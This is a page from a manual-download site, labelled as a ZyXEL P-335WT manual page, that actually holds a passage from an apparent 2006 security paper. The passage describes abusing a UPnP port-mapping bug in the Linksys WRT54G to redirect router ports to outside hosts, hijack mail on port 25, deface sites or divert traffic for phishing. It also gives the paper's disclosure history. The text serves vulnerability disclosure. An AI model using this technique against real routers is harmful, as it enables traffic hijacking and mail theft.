ZyXEL Communications P-335WT Bedienungsanleitung PDF herunterladen (Seite 10)

WAN

www.sane.nl

ev1l h4x0r

AddPortMapping

on port 22 to

www.sane.nl:22

Telco/LAN Router

The hack works as follows:

• Let machine A ask the Speedtouch to forward all traﬃc on port 22 on the

external interface to port 22 on the Linksys router.

• Let machine B exploit the bug in the UPnP implementation on the Linksys

router and let the router forward port 22 on the external interface to port 22

on a random host on the Internet (say www.sane.nl)

This way, if you connect to the ADSL router on port 22 from the Internet, you will

be routed to port 22 on www.sane.nl. Because all traﬃc will go through two NAT

devices (namely the Linksys WRT54G and the ADSL router) it will appear as if all

traﬃc comes from the ADSL router. The hack can be made a bit simpler if machine

B asks the ADSL router to make the portforward instead of machine A.

Of course, if the only link between the Internet and the inside network is the

WRT54G, the hack is in fact a lot simpler. In the Netherlands this situation is

not very common, since the WRT54G has no built-in ADSL modem.

More serious hacks are possible with this bug. For example, this hole could be

exploited to hijack port 25 to capture someone’s mail if a mail server is running

behind the Internet Gateway Device and port 25 on the external interface is for-

warded to the internal mailserver. Hijacking can be done by ﬁrst deleting the exist-

ing portmapping for port 25 from the Internet Gateway Device and then creating

a new mapping to an external machine in the same way as is described above.

In a similar way you could redirect port 80 to another machine, and deface a website

without having to break into the webserver, or divert traﬃc and use it for phishing.

This bug was reported to Linksys in early february of 2006. Linksys found the

bug, but a replacement ﬁrmware was not yet available before the deadline for this

paper. Other vendors haven’t ﬁxed it yet. The sad truth is that this bug apparently

was already known by at least one vendor. In the GPL sources tarball from US

Robotics in the ﬁle ipt.c, dated March 1 2005, there are ﬁxes from US Robotics

which prevent this attack from happening (and as a side eﬀect also reject forwards

to the broadcast address, making the device strictly spoken incompliant with the

1 2 ... 5 6 7 8 9 10 11 12 13 14 15 16 17 18

Keine Kommentare

ZyXEL Communications P-335WT Bedienungsanleitung Seite 10